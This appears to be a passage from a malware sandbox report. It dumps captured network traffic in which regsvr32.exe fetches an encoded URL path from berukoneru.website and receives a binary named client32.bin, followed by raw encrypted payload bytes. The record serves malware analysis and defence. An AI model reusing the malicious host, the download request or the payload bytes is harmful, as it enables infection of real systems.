                        2021-12-14 09:34:07 UTC661INData Raw: ec 62 9f bc 1d 37 03 80 a9 34 02 cc a6 41 79 a3 1a aa aa aa bf 89 76 05 07 2a 3d 9e 07 aa 5a bd ed ce ff e2 a8 49 49 0e f0 3f c2 12 d5 e1 11 27 72 23 00 77 a4 f5 70 d5 7e d5 36 4b 3b 8c d0 57 5e e2 28 b4 7f 5d 0f ca 46 26 f0 0b 1c f1 a6 c9 b9 66 d7 05 bf 83 4c 8f 4c 75 7a 0f 3a 42 17 db a5 88 a8 6d 2b 54 ae ce 4d a9 0e 7d c1 b5 69 64 34 ce 02 aa ae 23 fe cb 06 a1 c5 8a 8f 95 f9 f6 de 29 90 30 08 46 90 be 1b eb 4f 9c bd d5 3d ef 91 29 52 0e 14 d0 37 45 29 2f de 63 c2 30 a3 f4 b5 96 a1 e5 15 04 64 42 10 2b 99 49 f6 ff ff 19 23 b8 d8 a0 37 bd 58 97 d7 4b 7c 44 c8 c3 b1 f8 47 ce 61 64 d1 a0 18 84 3f 92 6a 72 0a 59 0d 9b c9 c1 7d 5a a3 2f ef 44 db b8 a3 d5 9f 5f 5d 01 71 77 bb 91 3e 30 ce 3f cf 91 ab c0 56 da 5f 51 ed 2f f4 de de a3 17 d5 96 94 1a 34 bf 6c 83
                        Data Ascii: b74Ayv*=ZII?'r#wp~6K;W^(]F&fLLuz:Bm+TM}id4#)0FO=)R7E)/c0dB+I#7XK|DGad?jrY}Z/D_]qw>0?V_Q/4l
                        2021-12-14 09:34:07 UTC677INData Raw: 74 64 30 2b 47 63 05 4e 1a 92 63 4d 88 49 ac 7b 18 e6 66 8d c0 25 d7 7e d9 11 1b 4f 63 60 d7 26 d1 40 d4 34 6e 34 3d 4b 92 e5 d7 a5 9a 3d e3 aa 8b 11 69 45 06 e0 eb dd 13 3b e4 ab 18 fa 5c e3 62 7f 93 bc 12 14 64 16 dd 5a 06 be 89 69 5e 65 ff 7b 27 50 76 26 a1 36 18 4a bf 41 83 8d 32 53 95 00 1e ee 73 11 c9 fb 9d 51 90 3a 39 5a 7b a5 4a 90 93 75 60 b4 a8 34 90 7a 6d e3 26 5d 01 e1 15 2f 75 14 56 2d 3e a3 51 8f 13 c2 d9 a7 d4 f2 74 ac 31 a0 07 61 96 4d e9 74 71 23 a4 75 5c 5f c5 4b 90 38 27 65 6f ef e5 aa 73 dc 30 d3 59 85 05 15 2f 5b 84 86 e4 52 3c 0e a8 bf 8c d0 00 60 7e bd 0d 42 8d 07 ee 5f d2 2a 60 c1 45 57 83 62 9f e1 79 14 87 dc 39 aa 2a 84 fe b0 c0 04 7c 32 47 0d 59 ca 53 c0 a9 0e 70 52 d7 a6 6c b7 d2 50 27 75 f0 af b5 ff ed 71 b5 9e d0 98 b3 70 c0
                        Data Ascii: td0+GcNcMI{f%~Oc`&@4n4=K=iE;\bdZi^e{'Pv&6JA2SsQ:9Z{Ju`4zm&]/uV->Qt1aMtq#u\_K8'eos0Y/[R<`~B_*`EWby9*|2GYSpRlP'uqp
                        2021-12-14 09:34:07 UTC693INData Raw: 06 de ca b6 3b 58 d5 62 cc 8a fb 45 76 21 95 c0 b7 2c 97 8f 7a 17 6a ac dd 76 32 14 48 19 d0 f7 c1 ee d3 57 60 bd a5 93 62 80 9a af 88 21 6c f2 8b 96 f0 d2 d3 34 b0 93 6b e1 52 c5 e0 b9 09 dc 24 7a bd f8 df 67 a9 25 54 e7 de 5c 27 67 d5 fa 59 28 f5 37 6f d4 a7 77 ef 33 f7 a0 57 23 35 bf 1f 26 2f 21 24 2e ac 08 73 bb a6 cc 3e d8 4b 4b fb c3 f7 81 12 0a 84 64 e0 0f 53 9a 23 a7 71 ae d5 f0 ee 0d 75 e0 23 cf 60 07 52 87 2c 23 56 b9 be df 5e 73 1f 46 f8 26 c6 6e c1 c4 ac a0 81 94 36 a2 86 82 0a fc c3 93 e8 ec e7 f6 54 24 ad 75 ad b1 8e ee ec a4 90 7d ee 8b 09 c2 b8 57 51 ba b0 ea 34 67 e2 87 bf 0c 2d 47 77 a1 62 67 a6 0c 1b a3 9e 8c 2f f0 90 c7 cd 2d ac 34 88 21 79 00 a9 d9 15 ae 14 e7 9c 74 d0 c8 de e0 b0 7e 94 ae f8 af a3 a6 cd cc a7 9f f4 c4 d3 b0 23 7c 41
                        Data Ascii: ;XbEv!,zjv2HW`b!l4kR$zg%T\'gY(7ow3W#5&/!$.s>KKdS#qu#`R,#V^sF&n6T$u}WQ4g-Gwbg/-4!yt~#|A
                        2021-12-14 09:34:07 UTC709INData Raw: 1a 8b 8a c2 67 70 7e 71 54 68 79 73 a5 4e ab e3 4a b0 c0 35 cc 84 e5 09 8a 2d d4 b3 61 5c 7c a2 69 40 6d 93 fe 19 95 f1 37 72 e3 a4 cc e1 46 00 36 ad 08 70 09 48 ee df 28 59 f1 dc 84 d8 a6 88 9b 81 17 8e ac 5a 38 1e e3 b0 2c 58 88 bc 3c cc a0 d1 3f c9 e2 cd 71 82 5a a1 c4 49 0c ab e1 5d d1 4f 54 3c 7d a2 ed c9 e0 f5 88 65 0a 91 c0 51 f6 39 73 4c 95 3f e6 b4 ce f9 ff 68 3d da 15 d4 a3 b5 3e 9b f4 35 b5 15 04 36 86 d2 ec 26 ef ad 43 d2 da 21 a2 d9 f4 d3 7e 4c 68 aa bd 8e 8c d2 db 21 9d 03 68 fe f0 e3 c2 17 82 dc 14 81 fc 68 d1 32 7e 48 88 4d 6d a1 89 03 19 4f 65 74 d5 22 c5 7b 46 5c 8e e0 12 37 09 9f 86 e4 8c 00 7a 9c 9e 4c 98 c5 39 45 26 d1 e9 44 94 ff c8 ca 5c a2 f4 33 0d 2a aa 1f d3 4c 1c 0c 3f f3 08 7b a3 eb 7b e7 59 b5 5b bf cb 25 9b 11 72 93 d9 2d e6
                        Data Ascii: gp~qThysNJ5-a\|i@m7rF6pH(YZ8,X<?qZI]OT<}eQ9sL?h=>56&C!~Lh!hh2~HMmOet"{F\7zL9E&D\3*L?{{Y[%r-
                        2021-12-14 09:34:07 UTC725INData Raw: 33 c3 d5 ab 38 83 31 57 4d b0 0c 3c fc 3e 4f d3 9b 72 a3 e4 0c 6c 08 2f ff a4 6c 6a df b6 8c 7b 24 68 b0 0e d2 05 e2 f9 41 46 ca 15 b9 b7 02 0c e3 58 ba 11 31 8b ba 02 3a 0c 84 d5 36 ab 65 24 1f f9 e2 0f 83 47 9a 22 6f 31 de 9f 0f 48 b3 c9 db f9 ab 1d 27 e9 c5 83 98 15 d7 6c 93 b7 0e ed 5f c9 d9 03 df 84 ce 07 03 28 39 eb db c4 21 50 9c 97 90 2c 76 af c5 99 4a 54 f4 ba 0b 5d 24 61 50 81 c0 d8 7d 07 a2 e1 6b 26 5f 8b 7c 88 95 2c 76 4f d0 70 dd 80 88 86 50 b0 40 ad 95 3b 12 bc 72 7c d5 0a 64 6a 9b 5a 3c f4 3f 02 57 75 f9 dc 0a 2e ff 75 10 53 d2 85 61 8f 3f 50 d0 35 57 1d 0c 50 9d e4 f5 fd 6c 84 5d 36 96 76 96 d2 ff 6f b3 fd 55 53 1a c3 bf 4b b6 27 2d e6 3c 55 80 81 fc 5e 8c 97 1a f2 df 24 a3 b6 a9 d1 ef 67 e5 8d 7a 95 79 f4 9d 6e 17 78 d6 28 d0 4a 03 fb b4
                        Data Ascii: 381WM<>Orl/lj{$hAFX1:6e$G"o1H'l_(9!P,vJT]$aP}k&_|,vOpP@;r|djZ<?Wu.uSa?P5WPl]6voUSK'-<U^$gzynx(J
                        2021-12-14 09:34:07 UTC741INData Raw: 36 0c 6a 47 30 19 9c 4e 22 85 cb 33 b8 3c 86 72 6e eb c2 7f 61 f3 63 c9 32 ed 9a 6c 4e 71 21 a3 96 09 5b 1b f6 91 d8 af 7f 12 2f 29 bb 70 ab 1e 8f 4e 86 79 ad f6 43 a3 93 18 7d 1f cd c9 74 b0 36 46 e2 59 f2 66 4d 73 8d 51 79 81 72 ed e3 8b 3b 3c f9 23 bf 04 38 63 7f ed 81 2c 3c 66 e8 4d 85 47 dd da 40 0d f8 54 73 09 8e e5 8d 8d 56 86 3b 42 a5 20 c3 4d 3d 63 e6 81 2e d5 06 d0 40 d4 9b 0d 1b 77 b1 b5 59 66 f4 f3 d3 f0 a4 6a 03 8b d6 85 61 23 74 bb b4 54 a1 fa 5a 96 88 0d 48 0c 10 fc a7 55 bb fe 20 0d e3 f2 af 1a c5 61 fe 3f d1 72 04 af a2 d5 4c 24 76 71 d3 2c 1d 01 cc 92 44 5b b1 61 ea 2f e9 d5 61 5a c7 1d 6f 06 ad 68 4f d1 aa c8 64 89 7c 2f a9 56 0d 9e 5a 98 51 aa 2c 0b 5d 83 9b 9f 16 c2 e5 71 51 02 ea cc 84 39 90 e7 3b ce f7 eb ee e7 16 20 5a 10 d9 b7 22
                        Data Ascii: 6jG0N"3<rnac2lNq![/)pNyC}t6FYfMsQyr;<#8c,<fMG@TsV;B M=c.@wYfja#tTZHU a?rL$vq,D[a/aZohOd|/VZQ,]qQ9; Z"
                        2021-12-14 09:34:07 UTC757INData Raw: f2 e5 3a cd 32 2d ed 92 9d 3f 9d f5 64 8d 06 c5 e4 93 7f 3e 78 36 95 1c 30 12 88 9a 97 7e 9b 10 03 a4 d9 d5 b1 65 9e 77 c5 87 e2 43 68 be db 1f 8e 2e a5 55 62 3c ec df 5b 5e a5 61 b7 69 0c ae ee 83 66 7a f5 00 74 70 c2 44 a6 a0 92 0c 66 fa b1 20 92 77 bf 47 29 d0 51 4a 32 10 65 09 54 81 4f ca 93 25 3b c8 e6 6b f3 3d 7d 97 d1 00 ae 70 9d 06 59 3e 67 79 35 74 ea a1 ac 3c 5d 64 44 b3 02 ea 1a ec 16 0e 15 85 65 8c 11 2a 09 43 5a ad 8a 26 10 f6 44 b8 5c 39 ac e8 dc 38 55 3d 16 98 7a 7d 69 fb c6 57 64 49 89 04 01 eb bc 13 9b d2 51 58 5b b1 c4 77 7c 6c b9 4d 8e af 08 97 af 13 96 8a 13 dc 5b 85 ee 1d d9 f1 cb 2e 8d 50 2f 90 1a 74 47 9d 82 de ef bb d5 4b 2a 1c 36 7f f6 20 e8 e6 00 2f 63 53 d2 32 c8 6f 20 15 e4 5b ee d7 c5 b4 29 0f ad c9 4a db d2 7e b9 b1 d9 bf 4a
                        Data Ascii: :2-?d>x60~ewCh.Ub<[^aifztpDf wG)QJ2eTO%;k=}pY>gy5t<]dDe*CZ&D\98U=z}iWdIQX[w|lM[.P/tGK*6 /cS2o [)J~J
                        2021-12-14 09:34:07 UTC773INData Raw: 20 73 2e 57 0e da 3c 5f 79 54 cf f8 d9 3a ac c6 dd 9b d7 a4 39 61 8d 95 a4 49 72 7c 27 f5 8b 31 15 bb b1 a4 98 cd 3b 78 40 00 11 29 d8 f3 40 3f e5 24 c7 d0 44 db 15 b8 d0 20 72 e0 9d 97 4a eb ec 4c 78 60 b4 20 69 c7 26 d6 35 1e de 8d c2 21 c5 97 6d 4b a5 c3 49 16 5b d8 a6 e0 0f f2 84 9c d1 79 c0 82 53 97 59 e0 08 c2 cf 30 12 b5 5c 01 b9 dd c2 ee c3 36 24 f8 c7 cb e1 8a c7 fc 03 78 4b 1d ee 0a 44 0a 49 e0 cf 70 92 83 7c e4 ea 46 eb b2 dd eb 84 d1 99 14 0d de f8 64 26 f1 4b 89 99 b9 8e 38 6f 50 7d c3 4d a3 5a 10 f5 76 a0 20 0d 92 21 d1 72 f9 e7 a4 63 ff d0 b6 6b 3d b8 b2 cb 9f 53 83 29 ca db b3 aa f0 99 4c c0 77 df 06 d3 91 a4 f3 f3 97 a2 4b d3 ef 25 5c 44 cb 53 4b 0c 61 51 72 38 97 7d aa 8f 25 bb 4f 4d e7 f3 1b 93 67 be 35 a7 6d 10 26 d0 e9 75 49 03 9b fe
                        Data Ascii: s.W<_yT:9aIr|'1;x@)@?$D rJLx` i&5!mKI[ySY0\6$xKDIp|Fd&K8oP}MZv !rck=S)LwK%\DSKaQr8}%OMg5m&uI
                        2021-12-14 09:34:07 UTC789INData Raw: 36 19 cd 54 79 36 2b 6b 10 11 75 b0 3e 40 37 97 94 7d b3 d1 b3 ee 09 71 72 a8 16 9f 4c 06 27 52 09 90 a7 65 25 a4 a4 57 68 42 27 dd 6a 76 21 5f b3 5f 82 fe 88 df 67 74 1f 96 b4 23 a0 83 08 c2 ae 2d 1b fc ae e5 20 42 94 8a d8 7b d9 9b cf c3 7d 90 4b c0 21 97 33 34 d0 18 df fd d8 62 17 9d 9f 04 23 01 17 72 ad d8 e3 c8 36 ab ab 9c 6d a6 22 8a 34 fe 50 67 53 c5 95 c5 00 5e 38 04 78 1c ea fa f3 22 1e 4b 90 85 1f bb 19 f3 e4 1a 2e 5a d5 ee 09 ea 8a 92 12 37 4d 76 8c 5e 86 9a f6 0f 83 42 3d 9c 00 f1 3f 0a b2 7c 5a 8b 07 84 14 3c ee 7d ba 94 3d 04 25 74 dd 76 52 55 08 a3 7a 93 c7 7a 1d ab 8d 97 0e 87 eb b0 78 a9 b1 ef 0f 66 80 8a a6 12 cd 21 8a d8 66 2c bb 2d 78 c2 f3 b8 a0 53 6a 08 0a 6f d7 94 8a 1c 08 1b f7 0c 22 8d 33 21 1c 41 72 82 67 54 6c 50 cb 57 a0 17 74
                        Data Ascii: 6Ty6+ku>@7}qrL'Re%WhB'jv!__gt#- B{}K!34b#r6m"4PgS^8x"K.Z7Mv^B=?|Z<}=%tvRUzzxf!f,-xSjo"3!ArgTlPWt
                        2021-12-14 09:34:07 UTC805INData Raw: 0e 82 3b 28 5c 8a 23 f3 fe ac ea 89 97 4f fd 45 07 36 35 55 85 5f e4 c1 68 4d fa b0 54 a3 22 04 98 4f c7 b5 8d 23 7d b2 61 b6 31 34 20 b7 1b a4 d9 42 0b 7e 84 3a ce e7 2c 38 36 17 77 e7 e4 fc 2c 65 16 40 a0 54 34 a1 13 8a 38 48 80 ff 35 49 57 af 87 44 9a 1f fc e5 4c 13 ed 3a 2b e0 e7 ce 29 ed f9 71 81 2e b2 3f 69 f0 38 cd 38 b1 59 2a 92 fb 5c 83 29 11 0a e0 7b 1c 3f d2 c4 55 e4 71 e3 3c b5 7d 97 37 f4 89 35 3e 2a 90 9a 16 31 29 0e b4 2a 40 26 4c aa 45 d5 c7 d8 27 6a 16 b1 9a 67 61 41 a1 1a ba 9f 70 6e 9e e9 48 f7 c2 cc 52 c9 00 75 56 16 a2 d2 83 54 8f f5 d3 27 87 8d e6 67 d7 b0 37 8c b1 38 87 6b 58 e8 12 fe ec 00 2d fd 70 73 31 4e 6a 42 32 85 39 f6 e8 5b 9a 34 07 d7 bd 73 ea cc e2 da f0 8c 8d 5c ca 99 14 9d fd ba a1 e0 ed 4d 03 be 96 69 17 e0 56 c7 1f 7f
                        Data Ascii: ;(\#OE65U_hMT"O#}a14 B~:,86w,e@T48H5IWDL:+)q.?i88Y*\){?Uq<}75>*1)*@&LE'jgaApnHRuVT'g78kX-ps1NjB29[4s\MiV
                        2021-12-14 09:34:07 UTC821INData Raw: a0 19 9a db e6 23 d3 03 86 6f 75 af 47 d5 3f 20 85 14 19 0e b9 d4 63 8c fd 8a 9a af a9 f6 65 42 84 ce cc f3 73 04 88 70 20 03 2e 2d 3a f5 0f cf 45 fe 85 b5 60 0f 38 e4 0f 37 bc bf 4d f6 2c 45 a8 31 d4 65 37 db a7 ee c6 e6 95 0e bc 4a 8a 34 9d a4 0d 59 51 52 14 5c c1 0f 3c ec 47 b1 68 4c 80 4c 71 0c 20 bb b6 5b 7b d7 49 8d 03 7d d5 bb ae cc 8b d0 d0 02 e9 5a 65 53 ae 1e 2c a6 43 6e e2 1e c5 78 ff 67 8f f0 0d d1 d9 1e 13 2c a2 1d df 57 0b e7 72 4f c1 4e fd ee 99 04 21 c1 02 12 96 53 77 8d aa 83 93 27 ff a3 34 86 54 2e 18 ab 65 1d 56 65 e7 f0 fa 9f 11 fb 79 79 cc 44 ad 4a 13 67 7c 78 91 1b 35 3c f6 1d 35 63 f5 35 af 82 78 1c 11 a5 0d 76 24 5c 35 8e 9a 62 ca eb d1 dc 7d 1a a1 82 c4 f1 29 ea 1f 1c 46 3e 42 d1 69 f2 f0 01 dd e9 6b 1b 07 ff 17 68 ac d1 b5 48 8c
                        Data Ascii: #ouG? ceBsp .-:E`87M,E1e7J4YQR\<GhLLq [{I}ZeS,Cnxg,WrON!Sw'4T.eVeyyDJg|x5<5c5xv$\5b})F>BikhH
                        2021-12-14 09:34:07 UTC837INData Raw: 15 93 b0 c9 e5 45 68 a6 ac b4 73 14 04 8b d2 73 37 da 94 58 af 8c 71 a1 da 98 2f 7a 5f 00 68 57 45 4d 6b 23 a3 df ac b7 08 22 c0 21 92 9d 91 8b 92 62 0b c1 a4 d9 31 21 b2 82 fc 16 c3 c2 2c e6 f2 c9 7b 9e ed 62 e8 b1 c5 94 41 f1 99 7a db 30 24 96 ba 10 ac d7 87 21 08 bd c6 d3 02 47 9e 4d 19 3c 56 18 b8 86 af af 82 b6 d8 04 fc 7b 26 3f 88 0f 78 4b de 4d cd 3d 2d 67 48 53 e0 e8 f4 57 ba fb ab 11 65 6b 3f 5a 74 66 d8 6f cd a5 55 54 84 d7 84 2a 96 f0 7b ba fb 3a 40 ae 9a 7e 21 6d 09 fa 90 30 cc af f9 65 a6 50 8e 9b d2 63 fb a0 1f ac 48 d8 90 99 cc 91 db b9 d3 5a f0 df 5d f6 67 0a fc a1 83 ac 70 74 61 2d 1d 54 6f de e8 e2 75 10 9c ed a3 3d b9 89 38 fd 44 93 dc bb be 2a ee 11 5f 06 2e 3b 9d 7d 2a 31 15 93 0e c2 16 3f a1 08 92 6c 38 1e dc 9a b9 14 3b 62 e8 ab b8
                        Data Ascii: Ehss7Xq/z_hWEMk#"!b1!,{bAz0$!GM<V{&?xKM=-gHSWek?ZtfoUT*{:@~!m0ePcHZ]gpta-Tou=8D*_.;}*1?l8;b


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        4192.168.2.54979979.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                        TimestampkBytes transferredDirectionData
                        2021-12-14 09:34:07 UTC838OUTGET /tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:07 UTC838INHTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:07 GMT
                        Content-Type: application/zip
                        Content-Length: 268426
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=tfmpovqco4irtlnkvm30nfl1s5; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:07 UTC839INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
                        Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
                        2021-12-14 09:34:07 UTC854INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                        Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                        2021-12-14 09:34:07 UTC870INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                        Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                        2021-12-14 09:34:07 UTC886INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                        Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                        2021-12-14 09:34:07 UTC902INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                        Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                        2021-12-14 09:34:07 UTC918INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                        Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                        2021-12-14 09:34:07 UTC934INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
